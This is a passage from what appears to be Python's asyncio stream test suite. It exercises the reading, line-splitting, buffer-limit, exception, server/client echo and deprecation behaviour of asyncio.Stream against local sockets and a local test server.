stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=0, loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=-1, loop=self.loop,
_asyncio_internal=True)
def test_read_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in Stream's buffer
# before the event loop is run.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. Streams are fed with data after
# their 'readline' methods are called.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=3,
_asyncio_internal=True)
stream.feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream.feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
async def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2]))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
sock = socket.create_server(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.create_server(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(addr):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
with self.assertWarns(DeprecationWarning):
addr = server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
with self.assertWarns(DeprecationWarning):
addr = server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
with self.assertWarns(DeprecationWarning):
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# Stream's limit so that twice the limit is less than the size
# of the data written. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=1,
_asyncio_internal=True)
protocol = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(*args,
pass_fds={wfd},
loop=self.loop)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(stream.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that _StreamProtocol constructor
# retrieves the current loop if the loop parameter is not set
stream = mock.Mock()
protocol = _StreamProtocol(stream, _asyncio_internal=True)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises_deprecated(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('127.0.0.1', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_connection(
host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('localhost', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
stream = await asyncio.connect(host, port)
while True:
stream.write(b"foo\n")
await stream.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=123,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
self.assertEqual("<Stream mode=StreamMode.READ eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'data')
self.assertEqual("<Stream mode=StreamMode.READ 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<Stream mode=StreamMode.READ exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<Stream .+ waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__transport(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<Stream mode=StreamMode.READ transport=<Transport>>",
repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(stream.is_closing())
stream.close()
self.assertTrue(stream.is_closing())
self.loop.run_until_complete(stream.wait_closed())
def test_wait_closed_on_close_with_unread_data_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
stream.close()
self.loop.run_until_complete(stream.wait_closed())
def test_del_stream_before_sock_closing(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
async def test():
with test_utils.run_test_server() as httpd:
stream = await asyncio.connect(*httpd.address)
sock = stream.get_extra_info('socket')
self.assertNotEqual(sock.fileno(), -1)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
# drop refs to reader/writer
del stream
gc.collect()
                # give the event loop a chance to close the socket
await asyncio.sleep(0)
self.assertEqual(1, len(messages), messages)
self.assertEqual(sock.fileno(), -1)
self.loop.run_until_complete(test())
self.assertEqual(1, len(messages), messages)
self.assertEqual('An open stream object is being garbage '
'collected; call "stream.close()" explicitly.',
messages[0]['message'])
def test_del_stream_before_connection_made(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
pr = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
del stream
gc.collect()
tr, _ = self.loop.run_until_complete(
self.loop.create_connection(
lambda: pr, *httpd.address))
sock = tr.get_extra_info('socket')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(1, len(messages))
self.assertEqual('An open stream was garbage collected prior to '
'establishing network connection; '
'call "stream.close()" explicitly.',
messages[0]['message'])
def test_async_writer_api(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
await stream.close()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api_exception_after_close(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
with self.assertRaises(ConnectionResetError):
await stream.write(b'data')
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
# See http://bugs.python.org/issue35065
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address,
loop=self.loop))
wr.close()
f = wr.wait_closed()
self.loop.run_until_complete(f)
assert rd.at_eof()
f = rd.read()
data = self.loop.run_until_complete(f)
assert data == b''
self.assertEqual(messages, [])
def test_stream_reader_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamReader
with self.assertWarns(DeprecationWarning):
asyncio.StreamReader
def test_stream_writer_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamWriter
with self.assertWarns(DeprecationWarning):
asyncio.StreamWriter
def test_stream_reader_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.write(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.writelines([b'data', b'other'])
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
stream.write_eof()
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.drain()
self.loop.run_until_complete(inner())
def test_stream_writer_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.WRITE,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
stream.feed_data(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readline()
